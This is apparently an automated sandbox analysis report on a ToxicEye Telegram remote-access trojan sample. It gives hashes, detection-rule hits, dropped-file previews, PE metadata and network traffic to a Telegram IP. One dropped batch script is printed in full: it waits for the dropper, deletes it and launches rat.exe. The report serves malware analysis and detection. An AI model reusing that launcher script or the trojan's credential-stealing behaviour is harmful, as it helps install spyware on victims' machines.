                                                                                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.r.i.t.i.c.a.l.P.r.o.c.e.s.s.F.a.u.l.t.2.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.0.4.8.5.9.9.1.6.8.7.7.7.1.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.2.7.9.6.5.d.9.-.6.4.7.e.-.4.f.9.5.-.a.e.5.0.-.3.8.f.1.4.b.6.e.b.5.a.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.3.2.2.e.6.9.6.-.c.e.6.6.-.4.5.8.3.-.8.0.2.e.-.6.4.d.f.c.2.4.c.a.f.3.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.r.a.t...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.T.e.l.e.g.r.a.m.R.A.T...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.7.2.8.-.0.0.0.1.-.0.0.1.5.-.3.4.0.0.-.a.7.7.2.f.6.4.d.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.3.c.7.0.e.0.3.4.1.a.a.0.4.3.5.7.d.0.3.2.3.0.b.5.5.e.4.c.a.4.d.0.0.0.0.0.0.0.0.!.0.0.0.0.a.e.7.9.7.2.c.9.4.2.7.1.7.3.e.0.a.a.d.8.e.4.2.5.2.d.1.b.0.7.1.d.5.9.7.8.b.a.4.1.!.r.a.t...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.7.8././.0.3././.1.0.:.1.4.:.2.4.:.5.0.!.0.!.r.a.t...e.x.e.
                                                                                                  Process:C:\Windows\System32\WerFault.exe
                                                                                                  File Type:Mini DuMP crash report, 16 streams, Tue Jan 23 12:19:52 2024, 0x1205a4 type
                                                                                                  Category:dropped
                                                                                                  Size (bytes):687952
                                                                                                  Entropy (8bit):3.211364987680842
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6144:bSLS0p0ejzlHCO5+qgIW+M3QwofQNhJFRFNFXGFiF4QXAUfvykoM:bSLpGqI+wQrfohJFRFNFXGFiF4QXAum
                                                                                                  MD5:D6F259915638B2F98B77F638CB68BD5D
                                                                                                  SHA1:AE16005D1BB6FBDC0DD63386EAC02D68200181E2
                                                                                                  SHA-256:8F89C8B42D40B66640F7ED5BFEA30CB6468E7E59636977D203F83C1AAA09CA96
                                                                                                  SHA-512:D2983A1344663A1C816DE7DEC40406EB2686C4ACE90023D6B06F5DD600F73A1657992527D6EDA2766BBB634D7D084A5C5EECDE648ABF74B17CE0EA1E158C4930
                                                                                                  Malicious:false
                                                                                                  Preview:MDMP..a..... ........e.........................+..........<....6..........47.......Z..............l.......8...........T...........Pt...............L...........N..............................................................................eJ......pO......Lw......................T.......(....e.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                  Process:C:\Windows\System32\WerFault.exe
                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):7126
                                                                                                  Entropy (8bit):3.7184114723781843
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:R6l7wVeJpmgxXYk4jeB4tklprT89bwlgafcSdm:R6lXJp5hYkNB4tk8Kdf8
                                                                                                  MD5:49BC3862E05910DAEE980BD86FC3D383
                                                                                                  SHA1:FB2D50FAB1159379CB8460154D36943FA1181ADD
                                                                                                  SHA-256:1C7AB19EB9C76FF0AABF13E83CFBABC5A64838BEF83BDD0B672803B87F2511DB
                                                                                                  SHA-512:AFCD7420C41C5CE23DDBBB5755D6566539CD3634440EB744DD7831C0580CF7AC4BA836511C03250ABDDF6D9EB057CCD0C06FDE978DEB404A23C3879B208D0112
                                                                                                  Malicious:false
                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.9.2.8.<./.P.i.
                                                                                                  Process:C:\Windows\System32\WerFault.exe
                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4894
                                                                                                  Entropy (8bit):4.441494815128964
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:cvIwWl8zsuJg771I9pW/FHVVWpW8VYOYm8M4JLSFHyq8vRmW5mEBSAd:uIjfkI72W/F27VKJIWyEcAd
                                                                                                  MD5:F0C13322047970AAD1CD6127C8BE65D2
                                                                                                  SHA1:4E2358FF299D3C9D7666E47E5D65B54DC9AFBC1D
                                                                                                  SHA-256:D72C80B6544B8A65260F5C12F7008AAFD6F6961BC2AEC3963B8F36B8AD174973
                                                                                                  SHA-512:399E57BDACEA5A831ADCF468D3B79B4890BD3811258BE1004676002F4920D34A8FBDDE9CCFF53FCA2CD27E6BF8ABE9E4D5EEA27210904958B9E72A5FC74090B7
                                                                                                  Malicious:false
                                                                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="161482" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                  Process:C:\Users\user\Desktop\dAIJ6g47mZ.exe
                                                                                                  File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):114176
                                                                                                  Entropy (8bit):5.662688913298548
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:Ui+bobMsBnqLoM91qQIwnN5Qt5QJbzPbhDqI68QWGzCrAZu6+25a:mbobMsBnwouY8ZbxqH8QWGzCrAZu6Za
                                                                                                  MD5:B4354EE75E6D043AD4BA2C6D2DF30A6E
                                                                                                  SHA1:AE7972C9427173E0AAD8E4252D1B071D5978BA41
                                                                                                  SHA-256:638F25147BFEA8CDD2C8E010682388D64868D77E236995972059E7FCBCC6A517
                                                                                                  SHA-512:949B7C31BFAF6AEEAF319E0A651923FCC2C929A97D8AF7C9B7B488F33D3FEF386F7178A7D5DAB5EA256CB354ECCC0FF9995BD10CB5DB9D1C3224791DCE8B7FBB
                                                                                                  Malicious:true
                                                                                                  Yara Hits:
                                                                                                  • Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Users\ToxicEye\rat.exe, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_ToxicEye, Description: Yara detected ToxicEye, Source: C:\Users\ToxicEye\rat.exe, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Clipboard_Hijacker_3, Description: Yara detected Clipboard Hijacker, Source: C:\Users\ToxicEye\rat.exe, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\ToxicEye\rat.exe, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\ToxicEye\rat.exe, Author: Joe Security
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                  • Antivirus: ReversingLabs, Detection: 96%
                                                                                                  • Antivirus: Virustotal, Detection: 77%, Browse
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...2............."...0.............V.... ........@.. ....................... ............`.....................................O...................................D...8............................................ ............... ..H............text...|.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................7.......H.......T...........a.....................................................*.*..*.*.r...p*.*..*..*..*..*..*..*..*..*.*.*6.r...p.o....*..*..*..*..*"..s}...*>..s....%.}_...*..*..*.0..........s .........o.....o!...*..0..........s .........o.....o!...*..su...*2.o....sq...*2.o....sk...*....0../.......#..........o.... ....(".....(#...,..*#........*N...("...($...o....*".o"...i*&..lo#...*".o"...k*&..lo#...*....0.."..........o......(%...,..*.o....(&......*Z..-.r...p+.r...po....*....0..
                                                                                                  Process:C:\Users\user\Desktop\dAIJ6g47mZ.exe
                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):26
                                                                                                  Entropy (8bit):3.95006375643621
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:ggPYV:rPYV
                                                                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                  Malicious:false
                                                                                                  Preview:[ZoneTransfer]....ZoneId=0
                                                                                                  Process:C:\Users\user\Desktop\dAIJ6g47mZ.exe
                                                                                                  File Type:CSV text
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1498
                                                                                                  Entropy (8bit):5.364175471524945
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNCsXE4Npv:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAu
                                                                                                  MD5:F3E4B39D94849B092D4BB1072DD5F435
                                                                                                  SHA1:0D7C96B89B2901834CF0FF5EC99579B8DE65DD72
                                                                                                  SHA-256:BD51FDC1EF08B5BF92E800C79A01CD5783EA62FA3240505AC6AC8B5969782046
                                                                                                  SHA-512:C5B7C6D226EFDD26D14F55EFF6C5714ACF7452B70F29F43DC1E2BFEDA58F5883878EAFFE2B3AF060C656EA7BF99B94D9B3D3E22EF847625D5B78F60DD9DC1733
                                                                                                  Malicious:false
                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                                                                                                  Process:C:\Users\ToxicEye\rat.exe
                                                                                                  File Type:CSV text
                                                                                                  Category:modified
                                                                                                  Size (bytes):660
                                                                                                  Entropy (8bit):5.38575581059626
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12:Q3La/KDLI4MWuPXcp151KDLI4MN5I/k1BakvoDLI4MWuPakEOsk7v:ML9E4KQ71qE4GIs0E4KD
                                                                                                  MD5:E918A9A81162ACCFD3E06E02E11CB6C8
                                                                                                  SHA1:10F02DAEDB20582256A5601EE8898CFA8DC2BDD5
                                                                                                  SHA-256:912110B9095CDC4B124444955DD3ABAEFFB7C309A242A4B05299A26EC9920A21
                                                                                                  SHA-512:78D9CABEFE698E54197D7D03ABC3AC36F3AAA2DE80CD79AD780B67324F36D7CA3560F642873E8C20F2BB27A9C892D9A2F21898E4B469FAFE35BA0FAEE8A7936A
                                                                                                  Malicious:false
                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..
                                                                                                  Process:C:\Users\user\Desktop\dAIJ6g47mZ.exe
                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):187
                                                                                                  Entropy (8bit):5.035509335898349
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Qk7wDumh6ckanDFSaskUGKoQRw+HREzfyOH+S/bmMNMOhCJsw+HROirH9XEOASn:QkEXnIBdGKoQRw+HGnHNmUMsCKw+Hs8X
                                                                                                  MD5:B81A9F62E4C2D0CA213A1BB3BE0A2F68
                                                                                                  SHA1:7153764354586BC3D5E6AD975651B2B7114C1069
                                                                                                  SHA-256:8A99F144454AD261034F5DF966E30B751319175C0A0BA40B50B02C78E30AC542
                                                                                                  SHA-512:E69AACC45AB3F78D814C0F7FFF8C31B8DFF875B0023696327B8A79C578B49AA9E4E416AED94414B1FCF5F846CB94BEF62C8C91585D899876AD301DB965FEF8A9
                                                                                                  Malicious:false
                                                                                                  Preview::l..Tasklist /fi "PID eq 2960" | find ":"..if Errorlevel 1 (.. Timeout /T 1 /Nobreak.. Goto l..)..Del "dAIJ6g47mZ.exe"..Cd "C:\Users\ToxicEye"..Timeout /T 1 /Nobreak..Start "" "rat.exe"..
                                                                                                  Process:C:\Windows\System32\WerFault.exe
                                                                                                  File Type:MS Windows registry file, NT/2000 or above
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1835008
                                                                                                  Entropy (8bit):4.468600219537695
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6144:/zZfpi6ceLPx9skLmb0fWZWSP3aJG8nAgeiJRMMhA2zX4WABluuNBjDH5Sk:rZHtWZWOKnMM6bFpjj4k
                                                                                                  MD5:D99BA7462D6203578EAEE0AD13693DAE
                                                                                                  SHA1:9C4155E9C2DA6AD3F8935AAFD98FE88D80CE812E
                                                                                                  SHA-256:DAF4DBF1DDD62BFDDD4AF4F997D89492AA1164629B0C1301A57768A2D572FC95
                                                                                                  SHA-512:B3AA3BAF5EA76B12A4055E5AFA0492AA54CD5C02C60C5F2308A9741C7F6CB4439136A435953046DFC50DB35DB765F52551E4149AFE147F64EE4F8D09298F9A91
                                                                                                  Malicious:false
                                                                                                  Preview:regfH...H....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...w.M.................................................................................................................................................................................................................................................................................................................................................C........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                  Process:C:\Users\ToxicEye\rat.exe
                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):70
                                                                                                  Entropy (8bit):4.493518824601853
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:xI+MLCOKJcLBKL+zFkmL2KGpByCRyn:DOKoRF/G2CRyn
                                                                                                  MD5:0568E1D12CAFD998C97DBD9F453383BB
                                                                                                  SHA1:FCA14D1C55AAC0CE9A77CC395BCC6281FB97E443
                                                                                                  SHA-256:6CED86323ED187F6DA367851A00A0E20F67E95F904B78D1C659ED70620270C26
                                                                                                  SHA-512:8256508E7BD032030AC2583A2F57257EE109986789957ABE98412BB716BA77FA5E4A8906C6A105CAFB328EB3B8DC10301E46B9C98520D9FEAA98640EF03EA475
                                                                                                  Malicious:false
                                                                                                  Preview:[+] Hiding console window..[?] Already running 1 copy of the program..
                                                                                                  File type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Entropy (8bit):5.662688913298548
                                                                                                  TrID:
                                                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                  • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                  • Windows Screen Saver (13104/52) 0.07%
                                                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                  File name:dAIJ6g47mZ.exe
                                                                                                  File size:114'176 bytes
                                                                                                  MD5:b4354ee75e6d043ad4ba2c6d2df30a6e
                                                                                                  SHA1:ae7972c9427173e0aad8e4252d1b071d5978ba41
                                                                                                  SHA256:638f25147bfea8cdd2c8e010682388d64868d77e236995972059e7fcbcc6a517
                                                                                                  SHA512:949b7c31bfaf6aeeaf319e0a651923fcc2c929a97d8af7c9b7b488f33d3fef386f7178a7d5dab5ea256cb354eccc0ff9995bd10cb5db9d1c3224791dce8b7fbb
                                                                                                  SSDEEP:1536:Ui+bobMsBnqLoM91qQIwnN5Qt5QJbzPbhDqI68QWGzCrAZu6+25a:mbobMsBnwouY8ZbxqH8QWGzCrAZu6Za
                                                                                                  TLSH:C8B32D1C37FC1A19F7FF5B7978B261194B72B867A932D70D18D5188D08B2B818E11BA3
                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...2............."...0.............V.... ........@.. ....................... ............`................................
                                                                                                  Icon Hash:00928e8e8686b000
                                                                                                  Entrypoint:0x41d356
                                                                                                  Entrypoint Section:.text
                                                                                                  Digitally signed:false
                                                                                                  Imagebase:0x400000
                                                                                                  Subsystem:windows cui
                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                  DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                  Time Stamp:0xCB7FC332 [Thu Mar 10 14:24:50 2078 UTC]
                                                                                                  TLS Callbacks:
                                                                                                  CLR (.Net) Version:
                                                                                                  OS Version Major:4
                                                                                                  OS Version Minor:0
                                                                                                  File Version Major:4
                                                                                                  File Version Minor:0
                                                                                                  Subsystem Version Major:4
                                                                                                  Subsystem Version Minor:0
                                                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                  Instruction
                                                                                                  jmp dword ptr [00402000h]
                                                                                                  dec ecx
                                                                                                  jbe 00007FDB350120E3h
                                                                                                  outsb
                                                                                                  and byte ptr [ebp+65h], cl
                                                                                                  jbe 00007FDB350120E8h
                                                                                                  jbe 00007FDB35012084h
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [ecx], al
                                                                                                  add al, byte ptr [ebx]
                                                                                                  add al, 06h
                                                                                                  or byte ptr [eax], cl
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x1d3030x4f.text
                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x1e0000x5bc.rsrc
                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x200000xc.reloc
                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x1d2440x38.text
                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                  .text0x20000x1b37c0x1b400f981ec4e6b7ca2b585a5a67462cbe64cFalse0.4244283973623853data5.702465754060223IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                  .rsrc0x1e0000x5bc0x6007907b9697008599683b66a56d4c253abFalse0.4186197916666667data4.115204569554272IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                  .reloc0x200000xc0x2006d252e677ac089b71a09645c9359729aFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                  RT_VERSION0x1e0900x32cdata0.4211822660098522
                                                                                                  RT_MANIFEST0x1e3cc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                                                                  DLLImport
                                                                                                  mscoree.dll_CorExeMain
                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  Jan 23, 2024 13:19:49.286058903 CET49699443192.168.2.6149.154.167.220
                                                                                                  Jan 23, 2024 13:19:49.286092043 CET44349699149.154.167.220192.168.2.6
                                                                                                  Jan 23, 2024 13:19:49.286210060 CET49699443192.168.2.6149.154.167.220
                                                                                                  Jan 23, 2024 13:19:49.299298048 CET49699443192.168.2.6149.154.167.220
                                                                                                  Jan 23, 2024 13:19:49.299314022 CET44349699149.154.167.220192.168.2.6
                                                                                                  Jan 23, 2024 13:19:49.717947006 CET44349699149.154.167.220192.168.2.6
                                                                                                  Jan 23, 2024 13:19:49.718045950 CET49699443192.168.2.6149.154.167.220
                                                                                                  Jan 23, 2024 13:19:49.721827030 CET49699443192.168.2.6149.154.167.220
                                                                                                  Jan 23, 2024 13:19:49.721833944 CET44349699149.154.167.220192.168.2.6
                                                                                                  Jan 23, 2024 13:19:49.722023964 CET44349699149.154.167.220192.168.2.6
                                                                                                  Jan 23, 2024 13:19:49.767786980 CET49699443192.168.2.6149.154.167.220
                                                                                                  Jan 23, 2024 13:19:49.789567947 CET49699443192.168.2.6149.154.167.220
                                                                                                  Jan 23, 2024 13:19:49.833897114 CET44349699149.154.167.220192.168.2.6
                                                                                                  Jan 23, 2024 13:19:52.098843098 CET44349699149.154.167.220192.168.2.6
                                                                                                  Jan 23, 2024 13:19:52.098893881 CET44349699149.154.167.220192.168.2.6
                                                                                                  Jan 23, 2024 13:19:52.099000931 CET49699443192.168.2.6149.154.167.220
                                                                                                  Jan 23, 2024 13:19:52.119282961 CET49699443192.168.2.6149.154.167.220
                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  Jan 23, 2024 13:19:48.438899040 CET5315553192.168.2.61.1.1.1
                                                                                                  Jan 23, 2024 13:19:48.557838917 CET53531551.1.1.1192.168.2.6
                                                                                                  Jan 23, 2024 13:19:48.699702978 CET6445353192.168.2.61.1.1.1
                                                                                                  Jan 23, 2024 13:19:48.818393946 CET53644531.1.1.1192.168.2.6
                                                                                                  Jan 23, 2024 13:20:12.097091913 CET6358353192.168.2.61.1.1.1
